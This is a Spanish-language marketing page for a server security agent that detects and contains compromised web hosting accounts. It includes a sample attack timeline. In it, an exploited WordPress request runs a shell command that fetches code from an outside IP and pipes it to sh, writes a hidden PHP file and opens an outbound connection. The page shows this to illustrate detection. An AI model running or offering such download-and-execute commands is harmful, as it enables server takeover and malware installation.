Seguridad de compromiso web · de un servidor a una flota
Ve el ataque entero y lo corta dentro del servidor.Aísla la cuenta comprometida en el acto, sin tocar al resto.
No se fía de una sola señal: vigila a la vez todo lo que un ataque toca, desde la petición que entra hasta la conexión que intenta salir, y actúa cuando varias coinciden. Sin firmas y sin cambiar una línea de tu configuración.
El plan gratuito es permanente, y no recorta la detección: corre el mismo motor que los planes de pago.
Compromiso real · cuenta u1042
14:02:11.320requestPOST /wp-admin/admin-ajax.php
14:02:11.324execsh -c "curl -s 45.9.148.x/i|sh"
14:02:11.326write/var/www/u1042/wp-content/.u.php
14:02:11.331connectContenido45.9.148.x:443
Cuatro huellas, un solo caso. Los demás ven una cada uno; SHIELD ve la historia y corta.
Puesta en marcha
La instalación completa es este comando
El agente es un único ejecutable y no necesita nada más en la máquina: todo lo que hace falta para observar y decidir viaja dentro de él.
root@web-01
$ curl -sSL https://shield.get-app.store/install.sh | sudo sh
Arranca en modo observación: no bloquea nada hasta que tú lo decides. Y desinstalarlo cuesta lo mismo que instalarlo.
Verifica la firma del binario antes de tocar el servidor
Linux x86-64 y ARM64, en cualquier distribución
Registra el servicio y se calibra a lo que ya corre ahí
El problema
Un servidor comprometido te cuesta dinero y reputación
Da igual que sea un servidor con veinte sitios o un parque de mil: una sola cuenta comprometida contamina todo lo que tiene alrededor. IPs en blocklists, correo que deja de entregarse, defacement, minería que quema CPU, y un equipo de soporte enterrado en tickets de abuso.
El WAF y las firmas se evaden
El firewall de aplicación adivina en la petición; una webshell ofuscada o un 0-day pasan. Cuando salta la firma, el atacante ya lleva días dentro.
Los falsos positivos ahogan al equipo
Un detector ruidoso genera más trabajo que seguridad. Si no puedes ejecutarlo en modo bloqueo sin romper sitios legítimos, no lo ejecutas, y te quedas solo con alertas.
Tus IPs acaban en blocklists
Spam saliente, conexiones a servidores de atacantes y minería desde el proceso web queman tu reputación de red. Recuperar una IP bloqueada cuesta días de entregabilidad y clientes molestos.
En tres movimientos
Un agente. Ve el ataque, lo corta y sabe de qué cuenta viene.
1
Ve la ejecución
La webshell descifrada, el comando que se lanza, la conexión que sale. Seis planos mirando a la vez.
2
La contiene en el acto
Deniega la ejecución, mata el proceso, aísla la cuenta. Dentro del núcleo, no en la puerta.
3
La atribuye a la cuenta
Qué cuenta, qué proceso y qué petición. Aíslas al comprometido sin rozar a sus vecinos.
Lo que cambia el mes que viene en tus números, no en un cuadro de mandos.
Protege tu reputación de red
Corta spam, conexiones a servidores de atacantes y minería salientes antes de que quemen tus IPs. Menos blocklists, mejor entregabilidad, menos clientes furiosos.
¿Cómo lo hace?
Corta el tráfico malicioso saliente antes de que salga: la conexión se deniega en el acto si la IP está bloqueada o la cuenta en cuarentena, y el volumen de datos que sale se mide dentro del sistema para pillar la exfiltración. Lo que un servidor detecta se comparte firmado con el resto, así que una IP quemada en una máquina queda bloqueada en toda tu flota.
Libera a tu equipo
Contención prudente por defecto y sensibilidad ajustable por cuenta: tu equipo persigue amenazas reales, no fantasmas. Menos tickets de abuso y menos limpiezas manuales a medianoche.
¿Cómo lo hace?
Dos cosas bajan el ruido de raíz: la contención solo actúa sobre señales de certeza y todo lo demás se queda en aviso; y la sensibilidad se ajusta por cuenta, no de forma global —el sitio ruidoso no obliga a subir el umbral de todos—. Además, el modelo se afina con los datos de tu propia flota y una prueba estadística descarta los cambios que subirían el falso positivo antes de aplicarlos.
Contén sin daño colateral
Aísla la cuenta comprometida sin tocar a las vecinas del mismo servidor, y de forma reversible por si te equivocaras. El hosting compartido deja de ser un riesgo para todos.
¿Cómo lo hace?
El aislamiento es por cuenta, no por servidor: un candado dentro del núcleo atado a la identidad de la cuenta le corta solo a ella la ejecución y la red. Las vecinas siguen funcionando con normalidad. Y si resultara ser un error, la neutralización del fichero es reversible: guarda cómo deshacerla.
Responde y cumple
Cada evento queda encadenado al anterior, así que cualquier intento de borrar o retocar el rastro se detecta. Expediente por incidente, IP y cuenta, exportable a tu SIEM: la respuesta deja de ser arqueología.
¿Cómo lo hace?
Cada evento queda encadenado criptográficamente al anterior: cualquier borrado o retoque del rastro se detecta. Es una cadena de custodia que aguanta una auditoría. Cada compromiso genera su expediente —línea de tiempo, indicadores, trazado por IP y por cuenta— y todo se exporta ya en el formato de tu SIEM.
No pagas en rendimiento
≈50 MB de RAM y menos del 1 % de un núcleo, constantes hora tras hora. La decisión por evento se resuelve en microsegundos, sin motores externos ni consultas a ninguna nube. Mantienes tu densidad de cuentas y tus márgenes.
¿Cómo lo hace?
El agente decide sin motores pesados ni llamadas a la nube: la inteligencia va embebida en el propio binario —un único ejecutable, sin dependencias que instalar— y se ejecuta optimizada. Medido: la comprobación de conducta tarda 32 nanosegundos y el resto de motores se quedan en el orden del microsegundo.
Despliegue sencillo
Un instalador que se basta a sí mismo, cuatro sistemas de arranque soportados y un solo fichero de configuración. Sin agente pesado y sin extensión del intérprete que mantener versión a versión.
¿Cómo lo hace?
Un único instalador que se basta a sí mismo (inteligencia incluida), un solo fichero de configuración y soporte de cuatro sistemas de arranque (systemd, OpenRC, runit y SysV), así que funciona en cualquier distribución. No hay extensión de PHP que instalar ni mantener versión a versión: el agente vive fuera de la cuenta y se calibra solo a cada una.
Compruébalo con tus propios datos
Despliega el agente en tres servidores y déjalo en modo observación. En unos días tendrás el dato sobre tu propio tráfico: qué habría detectado, qué habría contenido y con cuánto ruido. Activar el bloqueo es un cambio de configuración posterior, y lo decides tú.